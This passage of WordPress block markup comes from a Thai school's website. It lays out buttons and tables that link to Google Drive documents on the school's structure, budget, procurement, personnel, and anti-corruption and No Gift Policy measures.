{\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" 